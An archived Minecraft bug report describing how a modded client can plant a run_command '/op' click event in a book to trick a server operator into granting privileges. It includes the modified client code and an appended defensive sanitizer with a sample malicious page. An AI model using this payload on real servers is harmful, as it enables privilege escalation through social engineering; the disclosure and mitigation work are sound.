Mojira Archive
MC-79734

Server accepting clickable commands in books from malicious clients causing server owner OPing player

A modded client is able to send raw JSON data for books. A malicious person might use this to create a book with run_command: /op Tibi, and then give it to an operator, who in turn might get fooled into pressing the link.

A vanilla server doesn't block these books.

Example of malicious use:
With Minecraft Coder Pack I can add a line in the GuiScreenBook around the part where it loops through all pages to add a run_command in the sendBookToServer(boolean) method.

GuiScreenBook.java
// MCP names
private void sendBookToServer(boolean p_146462_1_) throws IOException {

  // *snip*

  // Each page is wrapped in a text component and serialized to JSON.
  for (int var3 = 0; var3 < this.bookPages.tagCount(); ++var3) {
    String var4 = this.bookPages.getStringTagAt(var3);
    ChatComponentText var5 = new ChatComponentText(var4);

    var5.setChatStyle(new ChatStyle().setChatClickEvent(new ClickEvent(ClickEvent.Action.RUN_COMMAND, "/op Tibi")));    // Added malicious line

    var4 = IChatComponent.Serializer.componentToJson(var5);
    this.bookPages.set(var3, new NBTTagString(var4));
  }

  // *snip*
}

In the above example I can make a book saying: 'Click here for cookies' and then give it to an OP and when he clicks I'm OP.

Awaiting Response

Tibo

2015-04-19, 07:14 PM

2023-06-14, 12:42 PM

2018-10-02, 11:25 PM

Community Consensus

Minecraft 1.8.1 - Minecraft 1.8.8
Minecraft 1.8.1, Minecraft 1.8.3, Minecraft 1.8.4, Minecraft 1.8.5, Minecraft 1.8.6, Minecraft 1.8.7, Minecraft 1.8.8
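
One possible server-side check for the issue reported above, as an added example that is not part of the original report and is not Mojang's fix: it strips every clickEvent from page JSON submitted by a client before the book is stored, and returns what was removed so it can be logged. The function names and the sample page are constructed for illustration, and it assumes the vanilla book editor never produces click events.

```python
import json

# Assumption: the vanilla book editor never emits click events, so any
# clickEvent in a client-submitted page is dropped, whatever its action.
BLOCKED_KEYS = ("clickEvent",)

# Constructed sample mirroring the report: link text plus run_command.
MALICIOUS_PAGE = json.dumps({
    "text": "Click here for cookies",
    "clickEvent": {"action": "run_command", "value": "/op Tibi"},
})


def _strip(node, removed):
    """Copy a parsed component tree, leaving out blocked keys at any depth."""
    if isinstance(node, list):
        return [_strip(item, removed) for item in node]
    if isinstance(node, dict):
        clean = {}
        for key, value in node.items():
            if key in BLOCKED_KEYS:
                removed.append(value)  # kept so the caller can log it
            else:
                clean[key] = _strip(value, removed)
        return clean
    return node


def sanitize_page(raw):
    """Return (safe_json, removed_events) for one client-submitted page."""
    removed = []
    try:
        parsed = json.loads(raw)
        if not isinstance(parsed, (dict, list)):
            raise ValueError("not a component object or array")
        return json.dumps(_strip(parsed, removed)), removed
    except (ValueError, RecursionError):
        # Unparseable or too deeply nested input is stored as literal text.
        return json.dumps({"text": raw}), []


if __name__ == "__main__":
    safe, removed = sanitize_page(MALICIOUS_PAGE)
    print(safe)     # page JSON with the click event gone
    print(removed)  # what a server would write to its audit log
```

A non-empty removed list is also a detection signal: under the stated assumption, an unmodified client cannot have produced that page.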
